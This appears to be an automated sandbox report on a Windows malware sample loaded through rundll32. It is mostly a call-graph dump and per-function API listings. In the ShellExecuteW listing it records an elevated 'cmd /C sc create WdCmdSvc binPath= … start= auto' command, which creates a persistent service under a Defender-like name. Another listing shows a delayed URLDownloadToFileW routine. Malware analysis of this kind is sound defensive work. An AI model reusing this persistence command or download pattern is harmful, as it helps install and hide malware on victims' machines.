12196 483b90c 12193->12196 12198 463b34c 26 API calls 12195->12198 12197 463b34c 26 API calls 12196->12197 12199 483b92f 12197->12199 12200 483ba63 12198->12200 12201 463b08c 16 API calls 12199->12201 12202 46e4b64 72 API calls 12200->12202 12203 483b95b 12201->12203 12204 483ba7e 12202->12204 12205 463b08c 16 API calls 12204->12205 12205->12186 12217 472b7c8 SetLastError 12206->12217 12208 472a710 12225 472a600 12208->12225 12210 472a718 12234 4654f14 12210->12234 12212 472a720 12212->12179 12214 46e54f9 12213->12214 12311 46e5534 12214->12311 12216 46e5515 12216->12182 12249 46556e0 12217->12249 12219 472b7f1 GetLastError 12220 472b821 12219->12220 12221 472b7fc 12219->12221 12220->12208 12221->12220 12255 4659220 12221->12255 12223 472b80d 12224 4639410 4 API calls 12223->12224 12224->12220 12262 472ae5c 12225->12262 12227 472a61f 12228 472a657 12227->12228 12283 472bad4 12227->12283 12228->12210 12231 465a894 46 API calls 12232 472a652 12231->12232 12233 4639410 4 API calls 12232->12233 12233->12228 12235 4654f29 12234->12235 12236 465a894 46 API calls 12235->12236 12239 4654f61 12235->12239 12237 4654f51 12236->12237 12238 4639410 4 API calls 12237->12238 12238->12239 12240 4654e34 6 API calls 12239->12240 12242 4654f81 12240->12242 12241 4654fbf 12241->12212 12242->12241 12243 4654fb7 12242->12243 12244 4654fc3 12242->12244 12308 4655804 12243->12308 12246 4654f14 57 API calls 12244->12246 12247 4654fd6 12246->12247 12247->12241 12248 4655804 CreateDirectoryW 12247->12248 12248->12241 12260 463a8a4 12249->12260 12251 4655700 GetFullPathNameW 12252 4655712 12251->12252 12253 4655721 12251->12253 12252->12219 12253->12252 12254 4655736 GetFullPathNameW 12253->12254 12254->12252 12256 4659237 FormatMessageW 12255->12256 12257 4659231 12255->12257 12258 4659259 12256->12258 12257->12256 12259 465927f LocalFree 12258->12259 12259->12223 12261 463a8aa 12260->12261 12261->12251 12287 472b430 12262->12287 12264 472ae81 12265 465a894 46 API calls 12264->12265 12267 
472aea3 12264->12267 12266 472ae9e 12265->12266 12268 4639410 4 API calls 12266->12268 12269 465a894 46 API calls 12267->12269 12271 472aeca 12267->12271 12268->12267 12270 472aec5 12269->12270 12272 4639410 4 API calls 12270->12272 12273 472aeee 12271->12273 12274 465a894 46 API calls 12271->12274 12272->12271 12275 472af16 12273->12275 12293 472ac88 12273->12293 12276 472aee9 12274->12276 12275->12227 12279 4639410 4 API calls 12276->12279 12279->12273 12280 465a894 46 API calls 12281 472af11 12280->12281 12282 4639410 4 API calls 12281->12282 12282->12275 12284 472bae3 12283->12284 12286 472a63c 12283->12286 12285 472baf7 GetLogicalDrives 12284->12285 12284->12286 12285->12286 12286->12228 12286->12231 12289 472b439 12287->12289 12288 472b464 12288->12264 12289->12288 12290 465a894 46 API calls 12289->12290 12291 472b45f 12290->12291 12292 4639410 4 API calls 12291->12292 12292->12288 12296 4654e34 12293->12296 12297 463a8a4 12296->12297 12298 4654e47 GetFileAttributesW 12297->12298 12299 4654edb GetLastError 12298->12299 12300 4654e5a 12298->12300 12301 4654e62 12299->12301 12300->12301 12302 4654ea4 12300->12302 12303 4654e76 CreateFileW 12300->12303 12301->12275 12301->12280 12302->12301 12304 4654eb0 CreateFileW 12302->12304 12303->12301 12305 4654e93 CloseHandle 12303->12305 12306 4654ed7 12304->12306 12307 4654ecd CloseHandle 12304->12307 12305->12301 12306->12301 12307->12301 12309 463a8a4 12308->12309 12310 4655810 CreateDirectoryW 12309->12310 12310->12241 12312 46e554f 12311->12312 12313 46e557c 12312->12313 12314 46e55fa 12312->12314 12334 4654a18 12313->12334 12338 46549c0 12314->12338 12317 46e5604 12318 46556e0 2 API calls 12317->12318 12324 46e55f8 12317->12324 12320 46e561f GetLastError 12318->12320 12319 46e5599 12321 46556e0 2 API calls 12319->12321 12319->12324 12322 4659220 2 API calls 12320->12322 12323 46e55b8 GetLastError 12321->12323 12325 46e5638 12322->12325 12326 4659220 2 API calls 12323->12326 12324->12216 12327 465a964 72 API calls 
12325->12327 12328 46e55d1 12326->12328 12329 46e565a 12327->12329 12342 465a964 12328->12342 12331 4639410 4 API calls 12329->12331 12331->12324 12332 46e55f3 12333 4639410 4 API calls 12332->12333 12333->12324 12335 4654a66 12334->12335 12336 4654a2e 12334->12336 12335->12319 12337 4654a60 CreateFileW 12336->12337 12337->12335 12339 4654a14 12338->12339 12340 46549d6 12338->12340 12339->12317 12340->12339 12341 4654a0e CreateFileW 12340->12341 12341->12339 12343 465a972 12342->12343 12344 463f080 46 API calls 12343->12344 12345 465a99c 12344->12345 12348 4655cc4 12345->12348 12347 465a9aa 12347->12332 12351 4655cec 12348->12351 12354 4655d1c 12351->12354 12353 4655ce4 12353->12347 12355 4655d25 12354->12355 12358 4655d85 12355->12358 12360 4655bd4 12355->12360 12357 4655dec 12357->12353 12358->12357 12359 4655bd4 72 API calls 12358->12359 12359->12358 12363 4656054 12360->12363 12362 4655bed 12362->12358 12364 46560ae 12363->12364 12367 46560a7 12363->12367 12364->12362 12365 46545b0 26 API calls 12365->12367 12366 4655b58 72 API calls 12366->12367 12367->12364 12367->12365 12367->12366 12368 4817d04 PeekMessageW 12369 4817d25 12368->12369 12370 4817e06 12368->12370 12371 4817d35 12369->12371 12372 4817d2b IsWindowUnicode 12369->12372 12373 4817d46 PeekMessageW 12371->12373 12374 4817d5c PeekMessageA 12371->12374 12372->12371 12375 4817d70 12373->12375 12374->12375 12375->12370 12389 4819ba0 GetCapture 12375->12389 12377 4817dab 12377->12370 12396 4817b98 12377->12396 12386 4817de9 TranslateMessage 12387 4817df6 DispatchMessageW 12386->12387 12388 4817dfe DispatchMessageA 12386->12388 12387->12370 12388->12370 12390 4819bb5 12389->12390 12394 4819bc6 12389->12394 12390->12394 12424 4761d04 12390->12424 12392 4819bd1 12393 4819bd7 GetParent 12392->12393 12392->12394 12395 4761d04 7 API calls 12392->12395 12393->12392 12393->12394 12394->12377 12395->12392 12397 4817bc3 12396->12397 12398 4817bac 12396->12398 12397->12370 12400 4817a50 12397->12400 12398->12397 
12437 4819180 12398->12437 12401 4817a60 12400->12401 12402 4817a9a 12400->12402 12401->12402 12403 4817a87 TranslateMDISysAccel 12401->12403 12402->12370 12404 4817aa0 12402->12404 12403->12402 12405 4817abb 12404->12405 12406 4817b8e 12404->12406 12405->12406 12407 4817ac6 GetCapture 12405->12407 12406->12370 12419 4817a08 12406->12419 12408 4817b50 GetWindowThreadProcessId GetWindowThreadProcessId 12407->12408 12412 4817ad1 12407->12412 12408->12406 12409 4817b71 SendMessageW 12408->12409 12409->12406 12411 4817b2d 12409->12411 12411->12406 12413 4817b02 12412->12413 12414 4817aeb GetParent 12412->12414 12415 4817ae2 12412->12415 12692 4761d60 12412->12692 12413->12415 12416 4817b08 IsWindowUnicode 12413->12416 12414->12412 12415->12416 12417 4817b31 SendMessageA 12416->12417 12418 4817b12 SendMessageW 12416->12418 12417->12406 12417->12411 12418->12406 12418->12411 12420 4817a19 IsWindowUnicode 12419->12420 12421 4817a4d 12419->12421 12422 4817a25 IsDialogMessageW 12420->12422 12423 4817a3a IsDialogMessageA 12420->12423 12421->12370 12421->12386 12422->12421 12423->12421 12425 4761d0f GetWindowThreadProcessId 12424->12425 12426 4761d56 12424->12426 12425->12426 12427 4761d1a GetCurrentProcessId 12425->12427 12426->12392 12427->12426 12428 4761d24 12427->12428 12429 4761d2e GlobalFindAtomW 12428->12429 12430 4761d4f 12429->12430 12431 4761d3d GetPropW 12429->12431 12433 4761cd0 GetCurrentProcessId GetWindowThreadProcessId 12430->12433 12431->12426 12434 4761ce7 12433->12434 12435 4761cfd 12433->12435 12434->12435 12436 4761cec SendMessageW 12434->12436 12435->12426 12436->12435 12438 4819196 12437->12438 12439 48191ad 12437->12439 12445 481910c 12438->12445 12439->12397 12441 481919d 12454 4815a48 12441->12454 12446 481916c 12445->12446 12447 481911a 12445->12447 12446->12441 12447->12446 12448 4819130 IsWindowVisible 12447->12448 12448->12446 12449 481913a 12448->12449 12450 481914c 12449->12450 12451 481916e 12449->12451 12453 4819159 ShowWindow 12450->12453 
12466 4818f18 12451->12466 12453->12446 12455 4815a54 UnhookWindowsHookEx 12454->12455 12456 4815a5f 12454->12456 12455->12456 12457 4815a80 SetEvent GetCurrentThreadId 12456->12457 12458 4815ac6 12456->12458 12459 4815abd CloseHandle 12457->12459 12461 4815a98 12457->12461 12463 4818f58 12458->12463 12459->12458 12460 4815aa4 MsgWaitForMultipleObjects 12460->12459 12460->12461 12461->12460 12472 4817e30 12461->12472 12464 4818f75 12463->12464 12465 4818f65 KillTimer 12463->12465 12464->12439 12465->12464 12467 4818f58 KillTimer 12466->12467 12468 4818f28 SetTimer 12467->12468 12469 4818f54 12468->12469 12470 4818f4d 12468->12470 12469->12446 12471 4819180 128 API calls 12470->12471 12471->12469 12477 4817d04 PeekMessageW 12472->12477 12475 4817e4c 12475->12460 12478 4817d25 12477->12478 12479 4817e06 12477->12479 12480 4817d35 12478->12480 12481 4817d2b IsWindowUnicode 12478->12481 12479->12475 12498 4818ad8 12479->12498 12482 4817d46 PeekMessageW 12480->12482 12483 4817d5c PeekMessageA 12480->12483 12481->12480 12484 4817d70 12482->12484 12483->12484 12484->12479 12485 4819ba0 9 API calls 12484->12485 12486 4817dab 12485->12486 12486->12479 12487 4817b98 122 API calls 12486->12487 12488 4817db8 12487->12488 12488->12479 12489 4817a50 TranslateMDISysAccel 12488->12489 12490 4817dcb 12489->12490 12490->12479 12491 4817aa0 15 API calls 12490->12491 12492 4817dd8 12491->12492 12492->12479 12493 4817a08 3 API calls 12492->12493 12494 4817de5 12493->12494 12494->12479 12495 4817de9 TranslateMessage 12494->12495 12496 4817df6 DispatchMessageW 12495->12496 12497 4817dfe DispatchMessageA 12495->12497 12496->12479 12497->12479 12518 4818a4c GetCursorPos 12498->12518 12501 4819180 126 API calls 12502 4818b21 12501->12502 12521 4818d34 12502->12521 12504 4818b43 12505 4818b91 GetCurrentThreadId 12504->12505 12507 4818b93 12504->12507 12508 4818b89 12504->12508 12509 4818c13 12505->12509 12510 4818c0c 12505->12510 12507->12505 12515 4818baf SetTimer 12507->12515 12525 48189e8 
12508->12525 12513 4818c21 WaitMessage 12509->12513 12514 4818c26 12509->12514 12531 46f22d0 12510->12531 12513->12514 12514->12475 12515->12505 12516 4818bd6 12515->12516 12517 48189e8 74 API calls 12516->12517 12517->12505 12557 4763878 12518->12557 12522 4818d48 12521->12522 12524 4818d5e 12522->12524 12583 478bd7c 12522->12583 12524->12504 12529 48189f5 12525->12529 12526 4818a48 12526->12505 12528 4818a1f IsWindowVisible 12528->12529 12529->12526 12529->12528 12530 4818a30 IsWindowEnabled 12529->12530 12599 481495c 12529->12599 12530->12529 12532 46f22ed 12531->12532 12533 46f22e4 12531->12533 12602 46f299c 12532->12602 12533->12509 12536 46f232b 12538 46f232f 12536->12538 12539 46f2338 12536->12539 12537 46f299c 78 API calls 12540 46f2304 12537->12540 12613 46f22a8 WaitForSingleObject 12538->12613 12617 46f229c ResetEvent 12539->12617 12544 465a964 72 API calls 12540->12544 12543 46f2336 12618 4638c24 12543->12618 12545 46f2326 12544->12545 12546 4639410 4 API calls 12545->12546 12546->12536 12548 46f2351 12549 46389ac 13 API calls 12548->12549 12555 46f2359 12549->12555 12550 46f24c6 12550->12509 12551 46de084 72 API calls 12551->12555 12554 4638c24 5 API calls 12554->12555 12555->12509 12555->12550 12555->12551 12555->12554 12556 46389ac 13 API calls 12555->12556 12622 46ddef8 12555->12622 12626 4638b8c 12555->12626 12556->12555 12562 4763844 WindowFromPoint 12557->12562 12559 476388c 12560 47638b2 12559->12560 12567 476b330 12559->12567 12560->12501 12560->12502 12563 4763871 12562->12563 12564 4763858 12562->12564 12563->12559 12564->12563 12565 4761d04 7 API calls 12564->12565 12566 4763865 GetParent 12564->12566 12565->12564 12566->12563 12566->12564 12571 476b3af 12567->12571 12572 476b34f 12567->12572 12568 476b3e6 12568->12560 12570 46de084 72 API calls 12570->12572 12571->12568 12574 46de084 12571->12574 12572->12570 12572->12571 12573 476b330 72 API calls 12572->12573 12573->12572 12575 46de091 12574->12575 12576 46de0a0 12574->12576 12578 46ddf98 
12575->12578 12576->12571 12579 463f080 46 API calls 12578->12579 12580 46ddfd6 12579->12580 12581 465a79c 72 API calls 12580->12581 12582 46ddfe5 12581->12582 12582->12582 12584 478bd82 12583->12584 12587 474b740 12584->12587 12586 478bd97 12586->12524 12588 474b746 12587->12588 12591 4718138 12588->12591 12590 474b75b 12590->12586 12592 471813e 12591->12592 12595 46f500c 12592->12595 12594 4718153 12594->12590 12596 46f5012 12595->12596 12597 46f35e8 76 API calls 12596->12597 12598 46f5027 12597->12598 12598->12594 12600 46de084 72 API calls 12599->12600 12601 481496c 12600->12601 12601->12529 12603 464028c 4 API calls 12602->12603 12604 46f29a2 12603->12604 12612 46f29f6 12604->12612 12632 46f0a98 12604->12632 12605 464028c 4 API calls 12607 46f22f2 12605->12607 12607->12536 12607->12537 12610 46f29b7 12636 4703720 12610->12636 12611 464028c 4 API calls 12611->12612 12612->12605 12614 46f22bb 12613->12614 12615 46f22c0 12613->12615 12691 46f229c ResetEvent 12614->12691 12615->12543 12617->12543 12619 4638c2c 12618->12619 12620 4638850 5 API calls 12619->12620 12621 4638c42 12619->12621 12620->12621 12621->12548 12623 46ddf03 12622->12623 12624 46ddf98 72 API calls 12623->12624 12625 46ddf17 12623->12625 12624->12625 12625->12555 12627 4638b94 12626->12627 12628 4638c24 5 API calls 12627->12628 12629 4638b9b 12628->12629 12630 4638b44 2 API calls 12629->12630 12631 4638ba0 12630->12631 12631->12555 12633 46f0a9e 12632->12633 12650 46f2604 12633->12650 12635 46f0abd 12635->12610 12667 470386c 12636->12667 12638 4703747 12639 4703784 12638->12639 12640 470379a 12638->12640 12673 466e940 12639->12673 12642 4703798 12640->12642 12645 463f080 46 API calls 12640->12645 12680 4703910 12642->12680 12646 47037ca 12645->12646 12676 465a79c 12646->12676 12648 47037d9 12649 4639410 4 API calls 12648->12649 12649->12642 12651 46f2616 12650->12651 12652 46f265e 12651->12652 12653 46f26b4 GetCurrentThread GetCurrentThreadId 12651->12653 12663 4639c54 12652->12663 12655 46f26b2 
12653->12655 12655->12635 12656 46f2673 12656->12655 12657 46f267c GetLastError 12656->12657 12658 4659220 2 API calls 12657->12658 12659 46f268b 12658->12659 12660 465a964 72 API calls 12659->12660 12661 46f26ad 12660->12661 12662 4639410 4 API calls 12661->12662 12662->12655 12664 4639c71 12663->12664 12665 4639c90 CreateThread 12664->12665 12666 4639cb9 12665->12666 12666->12656 12668 470387b 12667->12668 12669 4638c24 5 API calls 12668->12669 12670 4703883 12669->12670 12671 46389ac 13 API calls 12670->12671 12672 470388b 12671->12672 12672->12638 12683 466fbd4 12673->12683 12675 466e957 12675->12642 12677 465a7a8 12676->12677 12678 4655cc4 72 API calls 12677->12678 12679 465a7d5 12678->12679 12679->12648 12681 4638b8c 7 API calls 12680->12681 12682 46f29f1 12681->12682 12682->12611 12684 466fbe4 12683->12684 12685 466fbed 12684->12685 12688 466fbf7 12684->12688 12686 466fb94 26 API calls 12685->12686 12689 466fbf5 12686->12689 12687 466fc00 12687->12675 12688->12687 12690 465a754 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 12688->12690 12689->12675 12690->12687 12691->12615 12693 4761d04 7 API calls 12692->12693 12694 4761d6a 12693->12694 12694->12412 12695 4635ee4 12696 4635ef4 12695->12696 12697 4635f7c 12695->12697 12700 4635f01 12696->12700 12701 4635f38 12696->12701 12698 4635f85 12697->12698 12699 463581c 12697->12699 12703 4635f9d 12698->12703 12717 46360ac 12698->12717 12702 46361f7 12699->12702 12707 4635840 VirtualQuery 12699->12707 12708 463591f 12699->12708 12705 4635f0c 12700->12705 12709 4635968 10 API calls 12700->12709 12704 4635968 10 API calls 12701->12704 12713 4635fc0 12703->12713 12714 4636084 12703->12714 12720 4635fa4 12703->12720 12706 4635f4f 12704->12706 12731 4635cec 10 API calls 12706->12731 12736 4635f75 12706->12736 12718 46358e7 12707->12718 12719 4635879 12707->12719 12712 4635968 10 API calls 12708->12712 12746 463591d 12708->12746 12710 4635f19 12709->12710 12729 4635cec 10 API calls 12710->12729 12735 4635f31 12710->12735 
12711 4635968 10 API calls 12722 46361c0 12711->12722 12740 4635936 12712->12740 12713->12720 12725 4636000 Sleep 12713->12725 12716 4635968 10 API calls 12714->12716 12738 463608d 12716->12738 12723 46360e8 Sleep 12717->12723 12724 4636110 12717->12724 12728 4636129 12717->12728 12747 4635968 12718->12747 12719->12718 12726 46358a6 VirtualAlloc 12719->12726 12727 46358a4 12719->12727 12722->12728 12739 4635cec 10 API calls 12722->12739 12723->12724 12732 4636102 Sleep 12723->12732 12724->12711 12724->12728 12725->12720 12733 4636018 Sleep 12725->12733 12726->12718 12734 46358bc VirtualAlloc 12726->12734 12727->12726 12729->12735 12730 46360a5 12731->12736 12732->12717 12733->12713 12734->12718 12737 46358d2 12734->12737 12737->12746 12738->12730 12742 4635cec 10 API calls 12738->12742 12743 46361e4 12739->12743 12744 4635cec 10 API calls 12740->12744 12740->12746 12741 46358ee 12741->12746 12771 4635cec 12741->12771 12742->12730 12744->12746 12748 4635bc8 12747->12748 12757 4635980 12747->12757 12749 4635ce0 12748->12749 12755 4635b8c 12748->12755 12750 4635714 VirtualAlloc 12749->12750 12751 4635ce9 12749->12751 12752 463574f 12750->12752 12753 463573f 12750->12753 12751->12741 12752->12741 12791 46356c8 12753->12791 12754 46359a1 12754->12741 12759 4635be6 12755->12759 12761 4635ba6 Sleep 12755->12761 12756 4635992 12756->12754 12760 4635a80 12756->12760 12765 4635a61 Sleep 12756->12765 12757->12756 12763 4635a1d Sleep 12757->12763 12766 463564c VirtualAlloc 12759->12766 12767 4635c04 12759->12767 12770 4635a8c 12760->12770 12796 463564c 12760->12796 12761->12759 12762 4635bbc Sleep 12761->12762 12762->12755 12763->12756 12764 4635a33 Sleep 12763->12764 12764->12757 12765->12760 12769 4635a77 Sleep 12765->12769 12766->12767 12767->12741 12769->12756 12770->12741 12772 4635d01 12771->12772 12773 4635de4 12771->12773 12775 4635d07 12772->12775 12779 4635d7e Sleep 12772->12779 12774 4635778 12773->12774 12773->12775 12777 4635ede 12774->12777 12778 46356c8 2 API 
calls 12774->12778 12776 4635d10 12775->12776 12782 4635dc2 Sleep 12775->12782 12785 4635df9 12775->12785 12776->12746 12777->12746 12780 4635789 12778->12780 12779->12775 12781 4635d98 Sleep 12779->12781 12784 463579f VirtualFree 12780->12784 12790 46357b9 12780->12790 12781->12772 12783 4635dd8 Sleep 12782->12783 12782->12785 12783->12775 12788 46357b0 12784->12788 12787 4635e78 VirtualFree 12785->12787 12789 4635e1c 12785->12789 12786 46357c2 VirtualQuery VirtualFree 12786->12788 12786->12790 12787->12746 12788->12746 12789->12746 12790->12786 12790->12788 12792 46356d1 12791->12792 12793 4635710 12791->12793 12792->12793 12794 46356dc Sleep 12792->12794 12793->12752 12794->12793 12795 46356f6 Sleep 12794->12795 12795->12792 12800 46355e0 12796->12800 12798 4635655 VirtualAlloc 12799 463566c 12798->12799 12799->12770 12801 4635580 12800->12801 12801->12798 12802 4640c34 12803 4640c5a 12802->12803 12804 4640cdb 12802->12804 12803->12804 12806 4640844 12803->12806 12807 464086f 12806->12807 12808 46408e0 RaiseException 12807->12808 12809 4640908 12807->12809 12825 4640975 12808->12825 12810 4640a3e 12809->12810 12811 464099d LoadLibraryA 12809->12811 12812 46409a8 12809->12812 12809->12825 12813 4640aa7 12810->12813 12816 4640a9b GetProcAddress 12810->12816 12810->12825 12811->12812 12814 46409f7 12812->12814 12815 46409ac GetLastError 12812->12815 12817 4640aab GetLastError 12813->12817 12813->12825 12822 4640a05 12814->12822 12823 4640a38 FreeLibrary 12814->12823 12819 46409bd 12815->12819 12816->12813 12818 4640abc 12817->12818 12820 4640ace RaiseException 12818->12820 12818->12825 12819->12814 12821 46409cf RaiseException 12819->12821 12820->12825 12821->12825 12822->12810 12824 4640a0b LocalAlloc 12822->12824 12823->12810 12824->12810 12826 4640a1b 12824->12826 12825->12803 12826->12810 12827 484ad34 12828 484ad63 12827->12828 12829 484adb2 GetMessageW 12828->12829 12831 4654e34 6 API calls 12828->12831 12830 484ada6 TranslateMessage DispatchMessageW 
12829->12830 12833 484adc2 12829->12833 12830->12829 12832 484ad72 12831->12832 12832->12829 12834 4655804 CreateDirectoryW 12832->12834 12835 484ad80 12834->12835 12840 4849f40 12835->12840 12837 484ad94 12844 484ac78 12837->12844 12839 484ada4 12839->12829 12841 4849f54 12840->12841 12853 484aae8 12841->12853 12843 4849f88 12843->12837 12845 484ac8f 12844->12845 12846 484ac9f Sleep 12845->12846 12847 484acc3 12846->12847 12848 484accc URLDownloadToFileW 12847->12848 12849 484ace8 12848->12849 12908 4849554 12849->12908 12851 484ad04 Sleep 12852 484ad28 12851->12852 12852->12839 12857 484ab1d 12853->12857 12854 484abae 12861 463eefc 12854->12861 12856 484ac17 12859 4639ddc SysFreeString 12856->12859 12857->12854 12877 46545e8 12857->12877 12860 484ac37 12859->12860 12860->12843 12862 4639ddc SysFreeString 12861->12862 12863 463ef24 12862->12863 12864 463ef7f 12863->12864 12881 463a800 12863->12881 12866 4639ddc SysFreeString 12864->12866 12867 463ef94 12866->12867 12867->12856 12868 463ef3f 12887 463ed58 12868->12887 12871 463ef5f 12873 463a800 2 API calls 12871->12873 12872 463ef6c 12874 4639ddc SysFreeString 12872->12874 12875 463ef6a 12873->12875 12874->12875 12876 463a1e8 3 API calls 12875->12876 12876->12864 12878 46545f8 12877->12878 12879 4654619 12878->12879 12903 46532b0 12878->12903 12879->12857 12882 463a80d 12881->12882 12886 463a814 12881->12886 12894 4639d7c 12882->12894 12898 463a650 12886->12898 12888 463ed8a 12887->12888 12889 463ed6d 12887->12889 12888->12871 12888->12872 12890 463edc8 12889->12890 12891 463ed75 12889->12891 12902 463f114 MultiByteToWideChar 12890->12902 12901 463f114 MultiByteToWideChar 12891->12901 12895 4639d90 12894->12895 12896 4639d80 SysAllocStringLen 12894->12896 12895->12886 12896->12895 12897 4639d74 12896->12897 12897->12894 12899 463a656 SysFreeString 12898->12899 12900 463a65c 12898->12900 12899->12900 12900->12868 12901->12888 12902->12888 12904 465a964 72 API calls 12903->12904 12905 46532c9 12904->12905 12906 

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • ShellExecuteW.SHELL32(00000000,runas,cmd.exe,00000000," start= auto,?), ref: 0484A0CC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: ExecuteShell
                                                                              • String ID: " start= auto$/C sc create WdCmdSvc binPath= "$cmd.exe$runas
                                                                              • API String ID: 587946157-3037528773
                                                                              • Opcode ID: d800eeb9f42e4b3e1a98e7d517fa421749e6c11dacd6e0370235a44fa165b609
                                                                              • Instruction ID: 2aadecfa1b6e9954e62f3c777fe406829269aa9f027ec90bc07ce0f2ca7aa6ea
                                                                              • Opcode Fuzzy Hash: d800eeb9f42e4b3e1a98e7d517fa421749e6c11dacd6e0370235a44fa165b609
                                                                              • Instruction Fuzzy Hash: 2EF0C87068430CBFF705EBD0DC82F5DB7A8EB84714F900579B404E6B80E6B87A019919
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • Sleep.KERNEL32(0000012C,00000000,0484AD29), ref: 0484ACB2
                                                                              • URLDownloadToFileW.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 0484ACCF
                                                                              • Sleep.KERNEL32(0000012C,0000012C,00000000,0484AD29), ref: 0484AD09
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: Sleep$DownloadFile
                                                                              • String ID:
                                                                              • API String ID: 2087964873-0
                                                                              • Opcode ID: a3c427e3c08d59c30445fda9494c10347fb94235f5fd75060dee6351953899c7
                                                                              • Instruction ID: d36866dfb34fb514ac69fb333de578acb2a873e350481c8e20ca1058dbe0deae
                                                                              • Opcode Fuzzy Hash: a3c427e3c08d59c30445fda9494c10347fb94235f5fd75060dee6351953899c7
                                                                              • Instruction Fuzzy Hash: 18113374A40688AFE740EBA8DC81A8D77B4EF49705F5045A8E510E73A0EB747E10DF59
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetUserDefaultUILanguage.KERNEL32(00000003,?,00000004,00000000,0463D5DC,?,?), ref: 0463D54E
                                                                              • GetLocaleInfoW.KERNEL32(?,00000003,?,00000004,00000000,0463D5DC,?,?), ref: 0463D557
                                                                                • Part of subcall function 0463D3E4: FindFirstFileW.KERNEL32(00000000,?,00000000,0463D442,?,00000001), ref: 0463D417
                                                                                • Part of subcall function 0463D3E4: FindClose.KERNEL32(00000000,00000000,?,00000000,0463D442,?,00000001), ref: 0463D427
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: Find$CloseDefaultFileFirstInfoLanguageLocaleUser
                                                                              • String ID:
                                                                              • API String ID: 3216391948-0
                                                                              • Opcode ID: 0e0c1a5d3d4cef2ab8e4fab5eb7faa2f72cb6438788a02cfd7499fdd986623d6
                                                                              • Instruction ID: c36bd90c309978810db77ec4d9684fa9ab23698a7a4e07b4de64867d95b9289f
                                                                              • Opcode Fuzzy Hash: 0e0c1a5d3d4cef2ab8e4fab5eb7faa2f72cb6438788a02cfd7499fdd986623d6
                                                                              • Instruction Fuzzy Hash: 7B119A70A041499FEB00FFE4C8919AEB3B5EF48309F504479E505E3391FB70BE048A69
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • FindFirstFileW.KERNEL32(00000000,?,00000000,0463D442,?,00000001), ref: 0463D417
                                                                              • FindClose.KERNEL32(00000000,00000000,?,00000000,0463D442,?,00000001), ref: 0463D427
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: Find$CloseFileFirst
                                                                              • String ID:
                                                                              • API String ID: 2295610775-0
                                                                              • Opcode ID: 1c32f35824aa8aad741e3a73cb0b7dbb023e11ce79655f5d64cfe34fc109d9c2
                                                                              • Instruction ID: 7897837af16ede1ef014c498f14a4c143f1f3b356999b27364518aed24dcdc4e
                                                                              • Opcode Fuzzy Hash: 1c32f35824aa8aad741e3a73cb0b7dbb023e11ce79655f5d64cfe34fc109d9c2
                                                                              • Instruction Fuzzy Hash: 43F0BE71504684AFDB10EBB4CC9288EB3ACEB48216BA044B5A400E3291FB35BF04A918
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0463D22D,?,?), ref: 0463D041
                                                                              • RegOpenKeyExW.ADVAPI32(80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0463D22D,?,?), ref: 0463D08A
                                                                              • RegOpenKeyExW.ADVAPI32(80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0463D22D,?,?), ref: 0463D0AC
                                                                              • RegOpenKeyExW.ADVAPI32(80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000), ref: 0463D0CA
                                                                              • RegOpenKeyExW.ADVAPI32(80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001), ref: 0463D0E8
                                                                              • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002), ref: 0463D106
                                                                              • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001), ref: 0463D124
                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,0463D210,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0463D22D), ref: 0463D164
                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000000,00000000,00000000,?,00000000,0463D210,?,80000001), ref: 0463D18F
                                                                              • RegCloseKey.ADVAPI32(?,0463D217,00000000,00000000,?,?,?,00000000,00000000,00000000,?,00000000,0463D210,?,80000001,Software\Embarcadero\Locales), ref: 0463D20A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
